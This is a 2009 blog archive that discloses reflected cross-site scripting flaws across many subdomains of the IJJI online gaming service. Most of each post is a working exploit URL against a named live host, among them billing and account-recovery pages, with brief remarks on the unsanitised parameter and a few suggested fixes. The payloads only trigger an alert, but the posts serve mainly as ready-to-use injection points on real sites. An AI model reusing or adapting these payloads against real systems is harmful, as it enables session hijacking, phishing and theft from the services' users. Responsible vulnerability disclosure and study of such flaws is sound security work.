Archive for the 'non-persistent' Category

Global Pre-Launch [BONUS2]

13 August 2009

Type: Non-persistent
Criteria: None

This post continues the disclosure of prelaunch.nhn script vulnerabilities across all subdomains on the IJJI service. We finish today with 8 more, bringing the total to 17 copies of the same script.

10) Miscellaneous

http://misc.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

11) Bulletin Board System

http://bbs.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

12) Channel

http://channel.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

13) Billing

http://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

14) HTTPS Billing

https://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

15) Facebook

http://facebook.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

16) Message

http://message.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

17) Avatar

http://avatar.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

It is important to note that if the launcher plugin is installed for either IE or Firefox then one of the following will occur:

If the user is authenticated, they will be alerted:

This channel does not exist

If the user is not authenticated, they will be redirected to login (with a timed delay in Firefox).

Global Pre-Launch [BONUS]

12 August 2009

Type: Non-persistent
Criteria: None

Thus begins the final 4 days of this experiment; hopefully ending with a bang.

This post will disclose 9 separate vulnerabilities in the prelaunch.nhn script used to communicate with the various plugins that launch one of the many games offered on the IJJI service.

1) Top-level

http://www.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

2) www2

http://www2.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

3) Huxley:The Dystopia

http://huxley.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

4) Soldier Front

http://sfront.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

5) GunZ

http://gunz.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

6) Drift City

http://drift.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

7) Lunia

http://lunia.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

8) Game

http://game.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

9) Events

http://event.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

They clearly all exploit the same parameter, as they share the same script. I plan to write up better descriptions in a separate post.

Game Screenshot

10 August 2009

Type: Non-persistent
Criteria: None

http://game.ijji.com/sshot.nhn?gameId=u_gunz&index=0);alert(/xss/.source

A fairly old method, updated so that the “xss” string no longer needs single or double quotes (both are now correctly encoded before output). The index variable still doesn’t strip anything that doesn’t resemble an integer.

HTTPS Add G Coin

8 August 2009

Type: Non-persistent
Criteria: Requires login

https://billing.ijji.com/payment/paymentprocess.nhn?RURL=%22%3E%3Cimg%20src=x%20onerror=alert(%27xss%27)%20alt=%22

Another vulnerability in the paymentprocess.nhn script. The RURL (referral URL) variable is neither checked for a valid address nor stripped of any characters. A particularly lazy example.

Outputted to a hidden input tag (REQ_RURL), there are no visible changes to the end-user.

Video Clip

7 August 2009

Type: Non-persistent
Criteria: None

http://game.ijji.com/movie.nhn?m=big&flvURL=http://.ijji.com/%22%3E%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E

The variable flvURL must contain the string “.ijji.com/” and start with a valid protocol (e.g. HTTP) or the content-length will be zero. However, the address doesn’t have to be a valid resource.

Find Account 2

6 August 2009

Type: Non-persistent
Criteria: Not logged in

http://member.ijji.com/account/findAccount.nhn?m=findMemberid&email=%22%3E%3Cimg%20src=x%20onerror=%22alert%28%27xss%27%29

No input check on the variable email. Low-risk, but vulnerable all the same.

Due to the recent IJJI redesign, the first Find Account post has been updated (link).

Billing Country

3 August 2009

Type: Non-persistent
Criteria: Logged in

http://billing.ijji.com/payment/paymentprocess.nhn?m=preCheck&REQ_METHOD=ONEBIP&country=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28%27xss%27%29%20/%3E

As part of the billing process, this page checks the REQ_METHOD parameter in order to point the user to the correct external website to make payment. There is no such check on the parameter country.

I suggest that instead of plaintext, the system makes use of country codes.

Avatar Contest

1 August 2009

Type: Non-persistent
Criteria: None

http://avatar.ijji.com/contest/viewPastWin.nhn?contestNo=45&contestantNo=20004&page=%22%3E%3Cimg%20src=x%20onerror=%22alert(%27xss%27)

The variable page is left completely unsanitized. A simple numerical check would prevent this.

HTTPS Billing

31 July 2009

Type: Non-persistent
Criteria: Requires login

https://billing.ijji.com/payment/paymentprocess.nhn?gameid=0004&itemid=S97&itemcoin=48&itemimgurl=http://images.ijjimax.com/v2/arcade/gunz/shop/icons/icon_fset_58_150.png%22%20onload=%22alert(%27xss%27)

BBS Editor

28 July 2009

Type: Non-persistent
Criteria: None

http://bbs.ijji.com/bbsEditor.nhn?width=570,370%29;alert%28/xss/.source%29;//&themeName=black

Note that the exploit will execute twice under Internet Explorer.

The vulnerability lies entirely within the variable width, which should only accept integer values, and of a restricted size (2-4 digits).

This exploit has been updated
